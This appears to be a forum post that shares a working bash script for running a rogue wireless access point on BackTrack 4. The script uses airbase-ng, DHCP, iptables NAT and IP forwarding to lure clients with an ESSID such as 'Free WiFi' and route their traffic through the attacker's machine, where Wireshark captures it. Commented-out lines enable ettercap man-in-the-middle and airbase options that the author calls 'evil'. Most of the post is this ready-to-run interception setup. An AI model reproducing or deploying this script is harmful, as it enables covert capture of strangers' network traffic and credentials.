I've finally got this working after a long while. My setup is as follows:
Vista laptop running BT4-Beta in VMWare Player
Internet source is a wireless connection using the on board laptop wifi card, to my Netgear DG834GT router.
Using the Alfa USB wifi adapter for creating the AP.
Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.
Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients aka illegal). If you want that on then uncomment and comment the relevant lines.
I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed, you can try it though, just uncomment the line.
Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces - I got sick of typing wlan0 and eth0 everytime I ran the script. It only asks for the AP SSID, the two interfaces are hard coded as wlan0 for the Alfa, and eth0 for the Internet source (even though my Internet source is wireless not ethernet).
This is running very fast from the client's point of view, I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.
Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:
Then I do a quick test using wget to verify that my internet connection is available to BT.:
Modified script for BT4-Beta:
Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.
# The iface inputs are commented out and hard coded, to save having to type them everytime the script is executed
#echo -n "Enter the name of the interface connected to the internet, for example eth0: "
#read -e IFACE
#echo -n "Enter your wireless interface name, for example wlan0: "
#read -e WIFACE
# here I have hard coded the two interfaces, change them if yours are different
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
# Below is the safe airbase command which does not use the evil options
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
# The line below is commented out, it uses the evil options -P and -C
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --table nat --flush
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
# Below ettercap is commented out, just remove the # if you want it on
#konsole -e ettercap -T -q -p -i at0 // // &
echo "1" > /proc/sys/net/ipv4/ip_forward